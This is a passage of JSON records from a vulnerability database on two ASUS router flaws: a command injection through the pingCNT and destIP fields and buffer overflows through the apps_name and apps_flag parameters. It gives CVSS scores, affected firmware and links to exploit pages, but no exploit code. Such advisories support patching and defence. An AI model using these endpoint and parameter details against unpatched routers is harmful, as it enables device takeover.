"rt-ac68u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.374.5047" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.374_4887" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.140" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.374.4755" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.220" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.270" }, { "model": "rt-ac68u", "scope": "eq", "trust": 0.6, "vendor": "asus", "version": "3.0.0.4.374_4561" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac1900_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac3100_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac3200_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac5300_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac87u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-ac88u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n18u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-004344" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "b1ack0wl", "sources": [ { "db": "CNNVD", "id": "CNNVD-201804-298" } ], "trust": 0.6 }, "cve": "CVE-2018-9285", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2018-9285", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.9, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CNVD-2020-63980", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-139317", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-9285", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-9285", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-9285", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2020-63980", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201804-298", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-139317", "trust": 0.1, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2018-9285", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" }, { "db": "VULMON", "id": "CVE-2018-9285" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287", "sources": [ { "db": "NVD", "id": "CVE-2018-9285" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" }, { "db": "VULMON", "id": "CVE-2018-9285" } ], "trust": 2.34 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-139317", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-139317" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2018-9285", "trust": 3.2 }, { "db": "PACKETSTORM", "id": "160049", "trust": 2.4 }, { "db": "JVNDB", "id": "JVNDB-2018-004344", "trust": 0.8 }, { "db": "CNVD", "id": "CNVD-2020-63980", "trust": 0.7 }, { "db": "CNNVD", "id": "CNNVD-201804-298", "trust": 0.7 }, { "db": "CXSECURITY", "id": "WLB-2020110103", "trust": 0.6 }, { "db": "VULHUB", "id": "VHN-139317", "trust": 0.1 }, { "db": "VULMON", "id": "CVE-2018-9285", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" }, { "db": "VULMON", "id": "CVE-2018-9285" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "id": "VAR-201804-1341", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" } ], "trust": 1.297841215 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" } ] }, "last_update_date": "2024-11-23T22:06:52.257000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "https://www.asus.com/sg/" }, { "title": "Patch for ASUS TM-AC1900 arbitrary command execution vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/240217" }, { "title": "Multiple ASUS Product operating system command injection vulnerability fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=83120" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-78", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-139317" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.1, "url": "http://packetstormsecurity.com/files/160049/asus-tm-ac1900-arbitrary-command-execution.html" }, { "trust": 2.6, "url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html" }, { "trust": 1.8, "url": "https://fortiguard.com/zeroday/fg-vd-17-216" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9285" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-9285" }, { "trust": 0.6, "url": "https://cxsecurity.com/issue/wlb-2020110103" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/78.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" }, { "db": "VULMON", "id": "CVE-2018-9285" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2020-63980" }, { "db": "VULHUB", "id": "VHN-139317" }, { "db": "VULMON", "id": "CVE-2018-9285" }, { "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "db": "CNNVD", "id": "CNNVD-201804-298" }, { "db": "NVD", "id": "CVE-2018-9285" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-11-18T00:00:00", "db": "CNVD", "id": "CNVD-2020-63980" }, { "date": "2018-04-04T00:00:00", "db": "VULHUB", "id": "VHN-139317" }, { "date": "2018-04-04T00:00:00", "db": "VULMON", "id": "CVE-2018-9285" }, { "date": "2018-06-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "date": "2018-04-04T00:00:00", "db": "CNNVD", "id": "CNNVD-201804-298" }, { "date": "2018-04-04T19:29:00.687000", "db": "NVD", "id": "CVE-2018-9285" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2020-11-18T00:00:00", "db": "CNVD", "id": "CNVD-2020-63980" }, { "date": "2018-05-22T00:00:00", "db": "VULHUB", "id": "VHN-139317" }, { "date": "2020-11-13T00:00:00", "db": "VULMON", "id": "CVE-2018-9285" }, { "date": "2018-06-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-004344" }, { "date": "2020-11-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201804-298" }, { "date": "2024-11-21T04:15:17.713000", "db": "NVD", "id": "CVE-2018-9285" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201804-298" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "plural ASUS In product OS Command injection vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-004344" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "operating system commend injection", "sources": [ { "db": "CNNVD", "id": "CNNVD-201804-298" } ], "trust": 0.6 } }
var-201401-0239
Vulnerability from variot
Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. ASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter 'apps_name' and The 'apps_flag' parameter
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201401-0239", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "tm-ac1900", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4..374_979" }, { "model": "rt-n56u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4..374_979" }, { "model": "rt-ac66u", "scope": "eq", "trust": 1.6, "vendor": "asus", "version": "3.0.0.4..374_979" }, { "model": "rt-ac66u", "scope": "eq", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374_979" }, { "model": "rt-n56u", "scope": "eq", "trust": 0.8, "vendor": "asustek computer", "version": "3.0.0.4.374_979" }, { "model": "rt-ac66u 3.0.0.4.374 979", "scope": null, "trust": 0.6, "vendor": "asustek computer", "version": null }, { "model": "rt-n56u 3.0.0.4.374 979", "scope": null, "trust": 0.6, "vendor": "asustek computer", "version": null } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNNVD", "id": "CNNVD-201401-417" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware", "vulnerable": true }, { "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005890" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Jacob Holcomb", "sources": [ { "db": "BID", "id": "65046" } ], "trust": 0.3 }, "cve": "CVE-2013-6343", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2013-6343", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2014-00486", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-66345", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-6343", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2013-6343", "trust": 0.8, "value": "High" }, { "author": "CNVD", "id": "CNVD-2014-00486", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201401-417", "trust": 0.6, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-66345", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "VULHUB", "id": "VHN-66345" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNNVD", "id": "CNNVD-201401-417" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple buffer overflows in web.c in httpd on the ASUS RT-N56U and RT-AC66U routers with firmware 3.0.0.4.374_979 allow remote attackers to execute arbitrary code via the (1) apps_name or (2) apps_flag parameter to APP_Installation.asp. ASUS RT-N56U / RT-AC66U is a router device developed by ASUS. ASUS RT-N56U router is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Failed attempts will likely cause a denial-of-service condition. \nASUS RT-N56U running firmware 3.0.0.4.374_979 and prior are vulnerable. The vulnerability stems from the fact that the APP_Installation.asp page does not filter \u0027apps_name\u0027 and The \u0027apps_flag\u0027 parameter", "sources": [ { "db": "NVD", "id": "CVE-2013-6343" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "BID", "id": "65046" }, { "db": "VULHUB", "id": "VHN-66345" } ], "trust": 2.52 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-66345", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-66345" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-6343", "trust": 3.4 }, { "db": "BID", "id": "65046", "trust": 2.0 }, { "db": "OSVDB", "id": "102267", "trust": 1.7 }, { "db": "EXPLOIT-DB", "id": "31033", "trust": 1.1 }, { "db": "JVNDB", "id": "JVNDB-2013-005890", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201401-417", "trust": 0.7 }, { "db": "CNVD", "id": "CNVD-2014-00486", "trust": 0.6 }, { "db": "PACKETSTORM", "id": "124855", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-84386", "trust": 0.1 }, { "db": "SEEBUG", "id": "SSVID-61364", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-66345", "trust": 0.1 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "VULHUB", "id": "VHN-66345" }, { "db": "BID", "id": "65046" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNNVD", "id": "CNNVD-201401-417" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "id": "VAR-201401-0239", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "VULHUB", "id": "VHN-66345" } ], "trust": 1.41918854 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "Network device" ], "sub_category": null, "trust": 0.6 } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" } ] }, "last_update_date": "2024-11-23T23:05:48.491000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Top Page", "trust": 0.8, "url": "http://www.asus.com/" }, { "title": "Cellspot router firmware update information", "trust": 0.8, "url": "https://support.t-mobile.com/docs/DOC-21994" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.asus.com/jp/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005890" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-66345" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://infosec42.blogspot.com/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/65046" }, { "trust": 1.1, "url": "https://support.t-mobile.com/docs/doc-21994" }, { "trust": 1.1, "url": "http://www.exploit-db.com/exploits/31033" }, { "trust": 1.1, "url": "http://osvdb.org/102267" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6343" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6343" }, { "trust": 0.8, "url": "http://infosec42.blogspot.jp/2014/01/exploit-asus-rt-n56u-remote-root-shell.html" }, { "trust": 0.6, "url": "https://bugs.webkit.org/show_bug.cgi?id=126946" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "VULHUB", "id": "VHN-66345" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNNVD", "id": "CNNVD-201401-417" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CNVD", "id": "CNVD-2014-00486" }, { "db": "VULHUB", "id": "VHN-66345" }, { "db": "BID", "id": "65046" }, { "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "db": "CNNVD", "id": "CNNVD-201401-417" }, { "db": "NVD", "id": "CVE-2013-6343" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-01-22T00:00:00", "db": "CNVD", "id": "CNVD-2014-00486" }, { "date": "2014-01-22T00:00:00", "db": "VULHUB", "id": "VHN-66345" }, { "date": "2014-01-21T00:00:00", "db": "BID", "id": "65046" }, { "date": "2014-01-24T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "date": "2014-01-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201401-417" }, { "date": "2014-01-22T05:22:12.737000", "db": "NVD", "id": "CVE-2013-6343" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-01-22T00:00:00", "db": "CNVD", "id": "CNVD-2014-00486" }, { "date": "2016-12-31T00:00:00", "db": "VULHUB", "id": "VHN-66345" }, { "date": "2014-01-21T00:00:00", "db": "BID", "id": "65046" }, { "date": "2016-02-10T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-005890" }, { "date": "2014-01-24T00:00:00", "db": "CNNVD", "id": "CNNVD-201401-417" }, { "date": "2024-11-21T01:59:02.770000", "db": "NVD", "id": "CVE-2013-6343" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201401-417" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "ASUS RT-N56U and RT-AC66U Router firmware buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-005890" } ], 